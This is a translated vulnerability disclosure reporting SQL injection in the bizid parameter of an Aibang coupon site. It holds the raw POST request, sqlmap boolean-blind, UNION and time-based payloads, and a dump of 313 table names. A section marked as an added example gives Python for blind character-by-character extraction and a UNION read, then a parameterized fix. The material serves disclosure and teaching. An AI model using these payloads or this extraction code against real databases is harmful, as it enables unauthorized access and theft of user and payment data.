
Vulnerability summary

Defect ID: wooyun-2015-0111496

Title: SQL injection on an Aibang site

Vendor: 爱帮网 (Aibang)

Author: 深度安全实验室

Submitted: 2015-05-01 18:57

Fixed: 2015-06-19 20:12

Published: 2015-06-19 20:12

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-05-01: details sent to the vendor, awaiting vendor handling
2015-05-05: vendor confirmed; details visible to the vendor only
2015-05-15: details opened to core white hats and domain experts
2015-05-25: details opened to regular white hats
2015-06-04: details opened to intern white hats
2015-06-19: details opened to the public

Brief description:

Detailed description:

http://youhui.aibang.com/


The original request is actually in the format below, but it did not work with the GET method, so it had to be converted into a POST:

[screenshot: 1.png]


The converted request:

POST /? HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://youhui.aibang.com/
Cookie: mid=39; PHPSESSID=71450d98f1d11ba4fde2d0550cbd0cf1; fid=--1430458512--17519120718969; city=%E4%B8%8A%E6%B5%B7
Host: youhui.aibang.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

area=discount&bizid=112021&cmd=getextralist&page=2&tid=2943273

The bizid parameter
Blind injection:

[screenshot: 8.png]

[screenshot: 9.png]

[screenshot: 2.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: bizid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: area=discount&bizid=112021 AND 3745=3745&cmd=getextralist&page=2&tid=2943273
Type: UNION query
Title: MySQL UNION query (NULL) - 37 columns
Payload: area=discount&bizid=112021 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7173707271,0x47554779486a41526b6e,0x7162646671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&cmd=getextralist&page=2&tid=2943273
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: area=discount&bizid=112021 AND SLEEP(5)&cmd=getextralist&page=2&tid=2943273
---
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0.11
Database: abpaid
[313 tables]
+---------------------------------+
| ABFunc |
| ABLog |
| ABRole |
| ABRoleFunc |
| ABScore |
| ABScoreHistory |
| ABShowTemplates |
| ABUser |
| AdvIndex |
| AdvInfo |
| AdvPos |
| AdvPosInfo |
| Adv_Contract |
| Adv_Email |
| Adv_EmailMap |
| Adv_Matter |
| Adv_MatterLog |
| Adv_Matter_BaiduListener |
| AlarmSetting |
| BizBindWeibo |
| BizCategory |
| BizInfo |
| BizSuggest |
| Category |
| CityPayRatio |
| ClientActive |
| ClientVersion |
| FriendLink |
| HasYhqPaidBizSortPlan |
| Hotspots |
| KeywordPayRatio |
| KeywordRetView |
| KeywordSuggestion |
| KeywordWhiteList |
| KuaiQianRecvLog |
| KuaiQianSendLog |
| MallProductNewAuto |
| MallProductPlanAuto |
| OftenReplay |
| OrderTask |
| OrderTaskOrderQueue |
| OrderTaskRecord |
| PPC_AB_Union_TelMap |
| PPC_BizAccount |
| PPC_BizAdv |
| PPC_BizAppealCallMap |
| PPC_BizBaseInfo |
| PPC_BizBlackCallMap |
| PPC_BizCallLog |
| PPC_BizExtraInfo |
| PPC_BizNewTel |
| PPC_BizPrice |
| PPC_BizSmsTelMap |
| PPC_BizTel |
| PPC_BizTelBindMap |
| PPC_BizTelBindMap_bak |
| PPC_BizTel_bak |
| PPC_Black |
| PPC_CallPrice |
| PPC_CallRecord |
| PPC_CardGroup |
| PPC_ConsumptionRecord |
| PPC_Contract |
| PPC_League |
| PPC_LeagueCommissionRecord |
| PPC_LostOriginCallRecord |
| PPC_OriginCallRecord |
| PPC_RechargeCard |
| PPC_RechargeRecord |
| PPC_ShowInitTabSets |
| PPC_ShowTab |
| PPC_ShowTabItem |
| PPC_TEL_BACK_OP_MAP |
| PPC_TEL_BACK_OP_MAP_bak |
| PPC_Tel |
| PPC_UnionFinance |
| PaidBiz |
| PaidBizInfoExtra |
| PaidBizShare |
| PaidBizShareSns |
| PaidBizSns |
| PaidBizTemplateSets |
| PaidBiz_Discount_Cate_Map |
| PaidBiz_ParentDiscount_City_Map |
| PaidContentVector |
| PaidContentVector2 |
| PaidContentVector_1 |
| PaidDiscountHistory |
| PaidInclusionYearPrice |
| PaidKeywordsForSearch |
| PaidMessage |
| PaidPlacementPlan |
| PaidProduct |
| PaidProduct2 |
| PaidProductInfo |
| PaidProductInfo2 |
| PaidProduct_bak |
| PaidThread |
| PaidThread_bak |
| Paid_Youhui_Spatial |
| PlanDetailsInfos |
| PlanKeywords |
| PlanPay |
| PpccAlarmLog |
| PpccBiz |
| PpccBizPaymentRecord |
| PpccCategory |
| PpccContract |
| PpccKeycatemap |
| PpccKeyword |
| PpccKeywordSugg |
| PpccOnlineProcess |
| PpccPlan |
| PpccPlanCateMap |
| PromotionMsg |
| PublicNotice |
| QQTuanBGData |
| QQTuanCouponMap |
| QQTuanPayTask |
| QWT_BizDeviceToken |
| QWT_BizDeviceTokenAndroid |
| RankStatusView |
| Regions |
| RegionsPayRatio |
| SequencePayRatio |
| SysMsg |
| SystemConfig |
| TmpPlan |
| TmpPlanKeywords |
| TmpPlanPay |
| ToolUniqueId |
| TuanAdEmailSub |
| TuanAddTuanBizInfo |
| TuanAgent |
| TuanAgentAccount |
| TuanAgentAccountLog |
| TuanAgentExpenseDeduction |
| TuanAgentRecharge |
| TuanAppraiser |
| TuanApprkx |
| TuanAwardee |
| TuanBiz2Tuan |
| TuanBizMarketTabSets |
| TuanBizQuan |
| TuanBizQuanMap |
| TuanCPS |
| TuanCPSClick |
| TuanCPSInfo |
| TuanCPSOrder |
| TuanCate |
| TuanChannel |
| TuanChannelProductRate |
| TuanCharge |
| TuanCityArea |
| TuanCommonQuestion |
| TuanContact |
| TuanCoopErrorLog |
| TuanCoopOrderSync |
| TuanCoopProBiz |
| TuanCoopProBiz_bak |
| TuanCoopProDesc |
| TuanCoopProDesc_bak |
| TuanCoopProPlan |
| TuanCoopProPlan_bak |
| TuanCoopProduct |
| TuanCoopProductJumpLog |
| TuanCoopProductMap |
| TuanCoopProductPics |
| TuanCoopProductPush |
| TuanCoopProduct_bak |
| TuanCoupon |
| TuanCouponList |
| TuanCouponSendSMSLog |
| TuanDeliver |
| TuanDisplayProductCities |
| TuanEmailNoticeList |
| TuanFrmCate |
| TuanFrmChannel |
| TuanFrmClick |
| TuanFrmLog |
| TuanGift |
| TuanInvestigation |
| TuanInvestigationOther |
| TuanInviteClick |
| TuanInviteReg |
| TuanKingdeeAgent |
| TuanKingdeeBiz |
| TuanKingdeeCity |
| TuanKingdeeClerk |
| TuanLotteryAwardee |
| TuanLotteryClick |
| TuanLotteryCoupon |
| TuanLotteryPrize |
| TuanMallAd |
| TuanOrder |
| TuanOrderAttrMap |
| TuanOrderRefund |
| TuanPayPeriods |
| TuanPayPlan |
| TuanPayPlanDetail |
| TuanPaySubmitLog |
| TuanPost |
| TuanPresent |
| TuanPresentAttachHistory |
| TuanPresentCode |
| TuanPresentLog |
| TuanProduct |
| TuanProductAttr |
| TuanProductAuditLog |
| TuanProductBiz |
| TuanProductBizAccount |
| TuanProductDesc |
| TuanProductLimit |
| TuanProductLimitAttrMap |
| TuanProductPlan |
| TuanProductSendAccount |
| TuanProductSpec |
| TuanProductSpecAttrMap |
| TuanQQCBOrder |
| TuanQuestion |
| TuanRefundOrderAuditRecords |
| TuanRefundOrderAuditStatus |
| TuanSNS |
| TuanSNSalipay |
| TuanSNSkaixin001 |
| TuanSNSnetease163 |
| TuanSNSqi360 |
| TuanSNSsina |
| TuanSpecialMarket |
| TuanSpecialMarketOnlineMap |
| TuanSpecialMarketProMap |
| TuanStar |
| TuanSubCate |
| TuanThread |
| TuanUserAccountLog |
| TuanUserAddr |
| TuanUserInfo |
| TuanUserPhoneSns |
| TuanUserRecommendRelation |
| TuanUserRecommendRelationBackup |
| UserDefinedTab |
| UserDefinedTabContent |
| UserDefinedTabSchema |
| UserDefinedTabSubList |
| UserMsg |
| UserQuestions |
| WdePaidBiz |
| WdePaidBizComment |
| WdePaidBizDiscount |
| WdePaidBizProduct |
| WedAct |
| WedActorInfo |
| WtuanSrv |
| XBizCustomInfo |
| XBizTopic |
| XDiscount |
| XDiscountCate |
| XDiscountRecord |
| XDiscount_bak |
| XManageComment |
| XProductCateMap |
| XProductCateMap2 |
| XProductCategory |
| XProductCategory2 |
| XProductComment |
| XQQOnline |
| XSecondaryDomain |
| XTabAccess |
| XVideo |
| XVideoSite |
| YouhuiBrandBiz |
| YoujuSortDefault |
| YoujuSortRule |
| YoujuSortSpecial |
| ZhiFuAlipayMsgLog |
| ZhiFuAlipayTradeLog |
| ZhiFuCmbcMsgLog |
| ZhiFuCmbcTradeLog |
| ZhiFuDnapayMsgLog |
| ZhiFuDnapayTradeLog |
| ZhiFuTenpayMsgLog |
| ZhiFuTenpayTradeLog |
| ZhiFuWYBRecvLog |
| ZhiFuWYBSendLog |
| ZhiFuWYRecvlog |
| ZhiFuWYSendlog |
| ZhiFuWapTenpayMsgLog |
| ZhiFuWapTenpayTradeLog |
| _paidForSearch |
| ab_top_adv |
| bid_index |
| bid_pids |
| bizActionLog |
| bizVisitHistory |
| biz_show_item |
| deal |
| detail_info_adv |
| errorlog |
| h5_abshow_bannerpic |
| h5_abshow_templates |
| h5_give_discount |
| index_pids |
| ip_tbl |
| methodlog |
| plan |
| plan_pic |
| plandesc |
| seo_biz_area_district_map |
| seo_biz_detail |
| seo_biz_page |
| show_adv |
| tmpCp |
| virtual_user |
+---------------------------------+
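The three techniques sqlmap reports above (boolean-based blind, UNION with 37 columns, time-based blind) all rest on one defect: the value of `bizid` is pasted into the SQL text of the getextralist query. The block below is an added example, not code from the report, the reporter or Aibang. It builds a constructed SQLite stand-in for the endpoint (the `biz` and `virtual_user` tables, their columns and the sample rows are invented for the demo; nothing about the real abpaid schema is assumed beyond the table list), reproduces the boolean-based probe and a UNION read, implements the binary-search extraction that a blind payload like `bizid=112021 AND 3745=3745` enables, and contrasts it with a handler that validates and binds the parameter. Time-based blind is not simulated because SQLite has no SLEEP().

```python
"""Added example (not from the WooYun report, the reporter, or Aibang):
a stand-in for the youhui.aibang.com getextralist handler, backed by an
in-memory SQLite database, showing why the sqlmap findings against `bizid`
work and how a parameterized handler treats the same payloads.
The tables, columns and rows below are constructed for the demo; the real
abpaid schema is only known from the table list in the report."""
import sqlite3

# Constructed sample data standing in for the abpaid database.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE biz (id INTEGER PRIMARY KEY, name TEXT, phone TEXT);
    INSERT INTO biz VALUES (112021, 'Demo shop', '021-0000');
    INSERT INTO biz VALUES (112022, 'Other shop', '021-1111');
    CREATE TABLE virtual_user (uid INTEGER, login TEXT, pwhash TEXT);
    INSERT INTO virtual_user VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
""")


def vulnerable_getextralist(bizid: str):
    """The flaw as sqlmap saw it: the POST parameter is concatenated into the SQL."""
    sql = "SELECT id, name, phone FROM biz WHERE id = " + bizid
    return conn.execute(sql).fetchall()


def safe_getextralist(bizid: str):
    """Hardened handler: check the type first, then bind the value as a parameter."""
    if not bizid.isdigit():
        raise ValueError("bizid must be a decimal integer")
    return conn.execute(
        "SELECT id, name, phone FROM biz WHERE id = ?", (int(bizid),)
    ).fetchall()


def safe_rejects(payload: str) -> bool:
    """True when the hardened handler refuses the payload outright."""
    try:
        safe_getextralist(payload)
    except ValueError:
        return True
    return False


def boolean_oracle(cond: str) -> bool:
    """One true/false probe, like sqlmap's `bizid=112021 AND 3745=3745`:
    the row for 112021 comes back only when the appended condition holds."""
    return len(vulnerable_getextralist(f"112021 AND ({cond})")) == 1


def blind_extract(oracle, expr: str) -> str:
    """Boolean-based blind extraction of a string-valued SQL expression.
    Binary-searches the length, then each character's code point, so the
    value is recovered from yes/no answers alone (about 7 probes per char)."""
    lo, hi = 0, 256
    while lo < hi:  # smallest n for which length(expr) > n is false, i.e. the length
        mid = (lo + hi) // 2
        if oracle(f"length({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 128
        while lo < hi:  # same search over the ASCII code of character `pos`
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def union_dump():
    """UNION-based read of another table. The column count must match the
    original SELECT: 3 here, 37 on the real endpoint according to sqlmap."""
    return vulnerable_getextralist(
        "112021 UNION ALL SELECT uid, login, pwhash FROM virtual_user"
    )


if __name__ == "__main__":
    print(vulnerable_getextralist("112021 AND 3745=3745"))  # the row for 112021
    print(vulnerable_getextralist("112021 AND 3745=3746"))  # []
    print(blind_extract(boolean_oracle, "(SELECT login FROM virtual_user LIMIT 1)"))
    print(union_dump())
    print(safe_rejects("112021 AND 3745=3745"), safe_getextralist("112021"))
```

Running the module prints the true/false differential, the login recovered character by character from that differential, the UNION rows from the second table, and the hardened handler rejecting the payload while still serving the legitimate value. The fix is the allow-list plus bound parameter; on the PHP 5.2/MySQL stack fingerprinted above the equivalent is casting `bizid` to int and using a prepared statement (mysqli or PDO) instead of string concatenation.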

Proof of vulnerability:

With this many tables, just pick one at random and pull some data~

[screenshot: 3.jpg]

Fix recommendation:

Copyright: please credit 深度安全实验室@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Rank: 13

Confirmed: 2015-05-05 20:11

Vendor reply:

The vulnerability exists, thank you.

Latest status:

None yet

